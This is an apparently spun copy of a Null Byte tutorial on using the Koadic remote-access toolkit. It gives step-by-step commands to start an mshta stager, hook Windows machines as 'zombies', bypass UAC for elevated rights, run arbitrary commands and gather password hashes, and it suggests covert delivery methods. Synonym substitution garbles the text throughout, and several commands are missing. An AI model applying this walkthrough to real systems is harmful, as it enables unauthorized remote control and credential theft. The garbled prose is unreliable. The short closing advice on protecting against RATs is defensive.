2 months ago

How to Use the Koadic Command & Control Remote Access Toolkit for Windows Post-Exploitation « Null Byte :: WonderHowTo

Koadic allows hackers to monitor along with control exploited Windows systems remotely. The tool facilitates remote access to Windows devices via the Windows Script Host, working with practically every type of Windows. Koadic is actually capable of sitting entirely in memory to evade detection along with is actually able to cryptographically secure its own web command-along with-control communications.

The Koadic post-exploitation toolkit serves as an alternative to tools like Meterpreter along with PowerShell Empire. While there is actually some difference within the way payloads are delivered, along with by which exploits, Koadic provides a fully-featured environment to remotely perform tasks on an exploited Windows system. The tool provides two main categories of functions, divided within the program as stagers along with implants.

Don’t Miss: How to Generate Stagers for Post Exploitation of Windows Hosts

Stagers are used to create the actual remote-access connections through different Windows-based processes, along with implants are used to complete tasks on systems which are already connected as zombie machines over the stager connection. These implants can execute commands, retrieve system keys along with password hashes, along with even play audio on the zombie device.

To begin using Koadic, the item first needs to be downloaded along with installed. In This kind of example, Koadic is actually installed on a Linux system, however, the item will potentially run on any system which has a Unix-like shell environment.

Step 1: Downloading & Installing Koadic

Koadic is actually available coming from zerosum0x0’s GitHub page. On systems with Git already installed, the source code can be downloaded by running the command below in a terminal window.

git clone https://github.com/zerosum0x0/koadic

Once the source code is actually downloaded, we can run cd koadic/ in order to move into the completely new Koadic directory. Once within the Koadic folder, we can use Pip to install the Python requirements. These requirements are listed within the “requirements.txt” file within the Koadic directory, so we’ll use This kind of as an argument for Pip as shown within the command below.

pip install -r requirements.txt

Once the requirements are installed, Koadic can be run by simply entering ./koadic coming from within the program directory.

If the program loads an interface similar to the one above, Koadic is actually ready to use!

Step 2: Preparing Koadic

The most useful command to gain an overview of Koadic usage is actually help.

The help command provides an overview of the different commands available. Koadic functions similarly to different frameworks you may be familiar with, such as Metasploit, along with as such, the item allows for individual modules to be loaded along with configured. Once a module is actually selected, parameters can be set, then the module can be run. Koadic also provides autocomplete triggered by pressing Tab, which makes the item a little easier to search for along with find commands.

Let’s begin by loading the mshta stager by running the command below.

use stager/js/mshta

The stager allows us to define where the Koadic command along with control is actually accessed by any “zombie” devices. We can view some of these available settings by running info once the stager is actually selected.

The stager allows us to define the IP, port, along with expiry date of the command along with control, as well as keys along with certificates if desired. The default port of “9999” should be fine for our test environment, however, the item should be confirmed which the “SRVHOST” IP value corresponds to your IP on your local network, or potentially to the VPS or server which Koadic is actually running on. To set the item manually, run the command below, where IP is actually the desired IP address for the staging server.


Once the staging server is actually configured, the item’s ready to be started off. Launch the stager by typing run on the Koadic command line along with pressing Enter.

Step 3: Connecting a Zombie PC to the C&C

A Windows PC can be connected to the Koadic “mshta” staging server by running just one line on the command prompt. This kind of command, similar to the one shown below, will begin with mshta followed by the IP along with port of the staging server. The command can also be retrieved coming from the Koadic command log itself, as the item is actually shown after running the stager.


Once This kind of command is actually run, the Windows device will be connected as a zombie to the command along with control. In a real-world attack, the command could generally be executed by another program, a USB Rubber Ducky, or through an application exploit, rather than simply being run by the user within the command prompt.

After the command is actually run, we can confirm which the zombie is actually connected by running zombies within Koadic.

The first zombie connected will be assigned the ID of 0. To view more information on This kind of zombie, we can run the command below.

zombies 0

This kind of device is actually already hooked, although not yet elevated. Next, we’ll look at gaining additional user privileges on the zombie machine.

Step 4: Privilege Escalation

To test privilege escalation against the Windows machine, we’ll use the “Bypass User Account Control” implant. We can load This kind of by running the command below within Koadic.

use implant/elevate/bypassuac_eventvwr

Next, we’ll set the payload value in order to develop the implant run. We can leave the value of “ZOMBIE” as “ALL” to attack all zombies, or set the item to the specific zombie one wishes to attack. To adjust the payload value, run the command shown below.


After the payload is actually set, we can launch the UAC bypass attempt by simply executing run coming from the Koadic command line.

Once the task is actually is actually complete, we can check which the privilege escalation attack was successful by checking the zombie information, as was done prior to the attempt. To check the status of the first zombie device, run zombies 0 on the Koadic command line.

When the “Elevated” status shows “YES!” the Windows device is actually at This kind of point hooked along with privilege escalation complete.

Step 5: Post-Exploitation with Koadic

Once we have an exploited device with elevated privileges, there are several rootkit functions we can perform coming from the Koadic command along with control. The “implant” modules, as shown within the image below, provide an overview of some of the functions available to be performed with Koadic.

The “exec_cmd” implant allows one to run any command on the Windows system. To load This kind of implant, run the command below.

use implant/manage/exec_cmd

To set the desired command, we can use the set command, as done previously when changing settings for different modules. To set the command to be run to dir, which will return a list of files along with directories, run the following command.

set CMD dir

To confirm these settings were changed, run info to view the module information.

If the implant settings are as desired, simply type run along with press Enter to run the module.

The possibility of shell access, like within the example above, shows how much control can be given to an attacker with just 1 command being run on a Windows system. different implants, such as the “gathering” tools shown within the image below, attempt to capture important information such as user account details along with password hashes along with send them to the command-along with-control server.

Koadic also provides several “fun” implants. The “voice” implant utilizes Window’s integrated text-to-speech tools to “speak” a message on the zombie computer. To use This kind of implant, first run use implant/fun/voice. The message can be set with set MESSAGE followed by the desired message to be spoken. The specific zombies can also be set within the same way as within the previous modules or the item can be left to the default value of “ALL” to be run on all zombies. To run the implant, simply type run along with press Enter.

While these attacks have mixed success, the majority of the rootkit implants are very effective, even on modern versions of Windows. The limited detection possibility along with potential for automation using Python establishes Koadic as a potent remote-access toolkit capable of carrying out complicated attacks.

Don’t Miss: Upgrade a Normal Command Shell to a Metasploit Meterpreter

Protecting Against RATs

Protecting a Windows device against remote-access toolkits is actually similar to preventing any different sort of malware attack. Users should always keep their systems updated to prevent malware being carried due to unpatched system vulnerabilities. Access to a PC should always be limited, as an attack can be carried out in a matter of seconds with physical access, as shown by the single string which granted remote access in This kind of tutorial. Lastly, the item’s always best to use an antivirus along with only run trusted executable files on a Windows system.

I trust which you enjoyed This kind of tutorial on Koadic! If you have any questions about This kind of tutorial or Koadic in general, feel free to leave a comment or reach me on Twitter @tahkion.

Cover image along with screenshots by TAKHION/Null Byte (cover background via NASA)

Leave a Comment

Your email address will not be published. Required fields are marked *

4 + six =